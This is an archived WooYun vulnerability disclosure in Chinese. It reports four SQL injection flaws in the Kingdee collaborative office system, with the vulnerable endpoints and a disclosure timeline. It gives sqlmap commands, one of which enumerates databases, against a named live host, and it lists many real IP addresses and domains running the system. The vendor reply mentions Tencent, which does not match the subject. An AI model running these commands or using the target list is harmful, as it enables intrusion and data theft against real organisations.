乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-05: 细节已通知厂商并且等待厂商处理中 2015-08-05: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-09-29: 细节向核心白帽子及相关领域专家公开 2015-10-09: 细节向普通白帽子公开 2015-10-19: 细节向实习白帽子公开 2015-11-03: 细节向公众公开
金蝶协作办公系统存在多个SQL注射漏洞,涉及很多大型的企业
总共存在四个SQL漏洞,打包提交了 详情如下:
/kingdee/file/file_sms_history.jsp?user_id=1 user_id存在漏洞/kingdee/file/getSerialNumber.jsp?cplei_id=1 cplei_id存在漏洞/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1 class_id存在漏洞/kingdee/flow_design/flow_class_custom_submit.jsp?class_id=1&action=delete class_id存在漏洞
0x0
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/file/file_sms_history.jsp?user_id=1"
0x1
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/file/getSerialNumber.jsp?cplei_id=1"
0x2
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1"
0x3
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/flow_design/flow_class_custom_submit.jsp?class_id=1&action=delete"
互联网案例非常多,列举几个:
http://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://122.139.60.103:800/kingdee/login/loginpage.jsphttp://oa.guanhao.com:8080/kingdee/login/loginpage.jsphttp://222.179.238.182:8082/kingdee/login/loginpage2.jsphttp://222.134.77.23:8080/kingdee/login/loginpage.jsphttp://221.4.245.218:8080/kingdee/login/loginpage.jsphttp://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://220.189.244.202:8080/kingdee/login/loginpage.jsphttp://222.133.44.10:8080/kingdee/login/loginpage.jsphttp://223.95.183.6:8080/kingdee/login/loginpage.jsphttp://61.190.20.51/kingdee/login/loginpage.jsphttp://60.194.110.187/kingdee/login/loginpage.jsphttp://oa.roen.cn/kingdee/login/loginpage.jsp
该漏洞可直接采用SQLMAP跑出数据:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1" --dbs
过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-03 11:34
感谢反馈,但是这个不是腾讯的系统。
暂无